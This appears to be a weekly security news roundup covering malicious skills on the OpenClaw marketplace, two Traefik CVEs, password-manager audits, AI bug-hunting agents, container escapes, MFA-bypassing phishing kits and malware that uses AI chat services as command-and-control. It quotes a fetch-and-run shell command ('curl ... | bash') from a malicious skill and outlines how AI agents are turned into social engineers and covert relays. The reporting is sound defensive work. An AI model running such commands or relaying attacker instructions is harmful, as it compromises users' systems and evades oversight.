Week in Security: February 15-21, 2026
This week was dominated by AI agent security disasters, the inevitable collapse of "trust us bro" password manager marketing, and the realization that container escapes aren't a kernel problem—they're a "we built too much abstraction" problem. The through line: convenience keeps winning until it catastrophically loses.
OpenClaw Is a Security Dumpster Fire (And Everyone Knew)
The #1 ranked skill on ClawHub was malware. Not a bug, not a vulnerability—actual malware that told users to run curl -sL malware_link | bash. The AI became the social engineer. Koi Security found 1,184 malicious skills total; Snyk scanned ~4,000 skills and found 283 (7.1%) exposing credentials in plaintext, including credit card numbers passed through LLM context windows.
Why this matters: This isn't a "patch it" situation. Full read/write access + untrusted input ingestion + zero-moderation skill marketplace = unfixable threat model with current LLM tech. Laurie Voss (founding CTO of npm) called it a "security dumpster fire." r/netsec's verdict: "the concept is unsafe by design, not just the implementation." Microsoft publishing a "Running OpenClaw safely" guide tells you everything—if Microsoft is writing safety guides for your tool, you've already lost.
Source: Koi Security report, r/netsec discussion
Traefik's Critical Week: Two CVEs, Same Root Cause Pattern
Two critical Traefik CVEs in one week. First, a TLS ClientAuth bypass on HTTP/3 (CVE-2025-68121) inherited from Go's crypto/tls session resumption bug—mutate ClientCAs between handshakes and resumed sessions bypass mTLS. Second, a STARTTLS DoS (CVE-2026-25949) where sending an 8-byte Postgres SSLRequest prelude clears all deadlines and leaks goroutines forever.
Why this matters: Both are the same failure mode: protocol fast-paths that assume well-behaved clients. The mTLS bypass affects all three major versions (v1 ≤1.7.34, v2 ≤2.11.36, v3 ≤3.6.7). Patches are out (v3.6.8, v2.11.37) but the pattern is worth noting—edge proxies are inheriting Go stdlib footguns at scale. If you're running HTTP/3 with mTLS, you were exposed.
Source: GitHub Advisory GHSA-gv8r-9rw9-9697, GitHub Advisory GHSA-89p3-4642-cr2w
Password Manager "Zero Knowledge" Is Usually Marketing (But Bitwarden Did the Work)
Ars Technica dropped a reality check: password manager "zero-knowledge" claims are often misleading. Server compromise can still be game over depending on implementation. But then Bitwarden's ETH Zurich audit dropped the same week—Applied Cryptography Group tested against malicious server scenarios specifically, published the full report, and all issues were patched.
Why this matters: This is how you actually back up "zero-knowledge" claims. Most vendors don't. The Ars story is the warning; the Bitwarden audit is the counterexample. If your password manager can't point to a published audit that tested malicious-server scenarios, you're trusting marketing copy. Bitwarden self-hosted remains the right call, but at least they're being honest about the threat model.
Source: Ars Technica, Bitwarden ETH Zurich Audit
The "Impact Gap" in AI Security Research
AISLE's AI system found 13 of 14 OpenSSL CVEs in 2025, including a CVSS 9.8 stack buffer overflow present since the SSLeay days (1990s). An autonomous bug bounty agent reached #86 on HackerOne's leaderboard with three DoD triages. But here's the gap: agents find technically valid exploits but can't assess business criticality. A CVSS 9.8 in a library nobody uses is noise. A CVSS 5.3 in your payment processor is existential.
Why this matters: The "Impact Gap" (technical exploitability ≠ business criticality) is the current unsolved problem in AI security research automation. We're great at finding vulns. We're terrible at answering "should I care?" That's the next frontier.
Source: AISLE blog, HackerOne leaderboard
Container Escapes Aren't a Kernel Problem
A manual sweep of 2025 container/k8s CVEs found 16 container escapes: 8 in runtimes, 8 in orchestrators. Zero were kernel-related. The #1 escape cause? Symlink issues. TOCTOU was lower than expected. Code/command injection in orchestrators took second place.
Why this matters: The "containers are just Linux processes, the kernel is fine" crowd is technically correct and practically wrong. The escapes are all in the runtimes and orchestrators layered on top. Container security is not a kernel problem—it's a "we built a complex abstraction on top of kernel primitives and the abstraction is full of holes" problem.
Source: nanovms blog
Starkiller-Style AiTM Phishing Makes TOTP Useless at Scale
New PhaaS proxies the real login page in real-time, bypassing MFA (TOTP) completely. Uses the old @ URL trick to disguise the malicious domain. This isn't theoretical—real-time proxying is now commoditized.
Why this matters: TOTP is cooked for high-value targets. Hardware keys or passkeys are the only real answer now. If you're still recommending TOTP as "MFA" in 2026, you're recommending security theater.
Source: Krebs
AI-as-C2: The Blind Spot Nobody's Talking About
Check Point PoC: malware uses WebView2 to prompt Grok/Copilot, which fetches attacker-controlled URLs and returns commands. No API key needed. The trick: AI service traffic is increasingly whitelisted by corporate proxies/DLP because blocking it kills productivity. C2 traffic hiding inside legitimate AI API calls is nearly invisible to standard network controls.
Why this matters: Behavioral detection is the only real answer—why is this process making AI API calls? r/cybersecurity take: "an absolute gift from the heavens for every cyber criminal." 25 upvotes, 3 comments as of 2026-02-21. Underreported everywhere.
Source: Check Point research, r/cybersecurity
What to Watch Next Week
The OpenClaw fallout is still unfolding—expect more CVEs and possibly regulatory attention. The autonomous bug bounty agent's trajectory (currently #86 on HackerOne) is worth tracking to see if it breaks into the top 50. And keep an eye on MCP server security; the eBay MCP server env injection CVE is the first of many.
That's the week. If you're self-hosting anything, patch Traefik. If you're running OpenClaw, stop. If you're still on TOTP for critical accounts, you know what to do.
Top comments (0)